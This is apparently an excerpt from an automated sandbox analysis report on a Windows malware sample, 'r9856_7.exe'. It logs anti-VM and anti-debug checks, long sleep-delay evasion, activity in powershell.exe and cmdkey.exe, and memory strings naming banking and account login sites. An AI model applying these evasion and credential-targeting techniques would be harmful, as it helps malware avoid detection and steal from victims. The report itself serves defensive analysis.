            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: r9856_7.exe PID: 6648, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: 8CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: 9CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: 9EC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: AEC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112096E rdtsc 4_2_0112096E
            Source: C:\Users\user\Desktop\r9856_7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5977Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2587Jump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 9785Jump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\r9856_7.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544Thread sleep count: 189 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544Thread sleep time: -378000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544Thread sleep count: 9785 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7544Thread sleep time: -19570000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564Thread sleep time: -61500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe TID: 7564Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A1BF60 FindFirstFileW,FindNextFileW,FindClose,8_2_00A1BF60
            Source: C:\Users\user\Desktop\r9856_7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 267_8V0-3.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 267_8V0-3.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 267_8V0-3.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 267_8V0-3.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 267_8V0-3.8.drBinary or memory string: discord.comVMware20,11696492231f
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3816401592.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1846834492.00000265261BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 267_8V0-3.8.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 267_8V0-3.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 267_8V0-3.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 267_8V0-3.8.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 267_8V0-3.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 267_8V0-3.8.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: 267_8V0-3.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 267_8V0-3.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 267_8V0-3.8.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 267_8V0-3.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 267_8V0-3.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 267_8V0-3.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112096E rdtsc 4_2_0112096E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004173F3 LdrLoadDll,4_2_004173F3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118A118 mov ecx, dword ptr fs:[00000030h]4_2_0118A118
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118A118 mov eax, dword ptr fs:[00000030h]4_2_0118A118
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118A118 mov eax, dword ptr fs:[00000030h]4_2_0118A118
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118A118 mov eax, dword ptr fs:[00000030h]4_2_0118A118
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A0115 mov eax, dword ptr fs:[00000030h]4_2_011A0115
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov eax, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov ecx, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov eax, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov eax, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov ecx, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov eax, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov eax, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov ecx, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov eax, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E10E mov ecx, dword ptr fs:[00000030h]4_2_0118E10E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01110124 mov eax, dword ptr fs:[00000030h]4_2_01110124
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01178158 mov eax, dword ptr fs:[00000030h]4_2_01178158
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01174144 mov eax, dword ptr fs:[00000030h]4_2_01174144
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01174144 mov eax, dword ptr fs:[00000030h]4_2_01174144
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01174144 mov ecx, dword ptr fs:[00000030h]4_2_01174144
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01174144 mov eax, dword ptr fs:[00000030h]4_2_01174144
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01174144 mov eax, dword ptr fs:[00000030h]4_2_01174144
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6154 mov eax, dword ptr fs:[00000030h]4_2_010E6154
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6154 mov eax, dword ptr fs:[00000030h]4_2_010E6154
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DC156 mov eax, dword ptr fs:[00000030h]4_2_010DC156
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4164 mov eax, dword ptr fs:[00000030h]4_2_011B4164
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4164 mov eax, dword ptr fs:[00000030h]4_2_011B4164
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116019F mov eax, dword ptr fs:[00000030h]4_2_0116019F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116019F mov eax, dword ptr fs:[00000030h]4_2_0116019F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116019F mov eax, dword ptr fs:[00000030h]4_2_0116019F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116019F mov eax, dword ptr fs:[00000030h]4_2_0116019F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119C188 mov eax, dword ptr fs:[00000030h]4_2_0119C188
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119C188 mov eax, dword ptr fs:[00000030h]4_2_0119C188
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01120185 mov eax, dword ptr fs:[00000030h]4_2_01120185
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01184180 mov eax, dword ptr fs:[00000030h]4_2_01184180
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01184180 mov eax, dword ptr fs:[00000030h]4_2_01184180
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA197 mov eax, dword ptr fs:[00000030h]4_2_010DA197
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA197 mov eax, dword ptr fs:[00000030h]4_2_010DA197
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA197 mov eax, dword ptr fs:[00000030h]4_2_010DA197
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E1D0 mov eax, dword ptr fs:[00000030h]4_2_0115E1D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E1D0 mov eax, dword ptr fs:[00000030h]4_2_0115E1D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0115E1D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E1D0 mov eax, dword ptr fs:[00000030h]4_2_0115E1D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E1D0 mov eax, dword ptr fs:[00000030h]4_2_0115E1D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A61C3 mov eax, dword ptr fs:[00000030h]4_2_011A61C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A61C3 mov eax, dword ptr fs:[00000030h]4_2_011A61C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011101F8 mov eax, dword ptr fs:[00000030h]4_2_011101F8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B61E5 mov eax, dword ptr fs:[00000030h]4_2_011B61E5
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01164000 mov ecx, dword ptr fs:[00000030h]4_2_01164000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01182000 mov eax, dword ptr fs:[00000030h]4_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE016 mov eax, dword ptr fs:[00000030h]4_2_010FE016
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE016 mov eax, dword ptr fs:[00000030h]4_2_010FE016
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE016 mov eax, dword ptr fs:[00000030h]4_2_010FE016
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE016 mov eax, dword ptr fs:[00000030h]4_2_010FE016
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176030 mov eax, dword ptr fs:[00000030h]4_2_01176030
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA020 mov eax, dword ptr fs:[00000030h]4_2_010DA020
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DC020 mov eax, dword ptr fs:[00000030h]4_2_010DC020
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166050 mov eax, dword ptr fs:[00000030h]4_2_01166050
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E2050 mov eax, dword ptr fs:[00000030h]4_2_010E2050
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110C073 mov eax, dword ptr fs:[00000030h]4_2_0110C073
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E208A mov eax, dword ptr fs:[00000030h]4_2_010E208A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A60B8 mov eax, dword ptr fs:[00000030h]4_2_011A60B8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A60B8 mov ecx, dword ptr fs:[00000030h]4_2_011A60B8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D80A0 mov eax, dword ptr fs:[00000030h]4_2_010D80A0
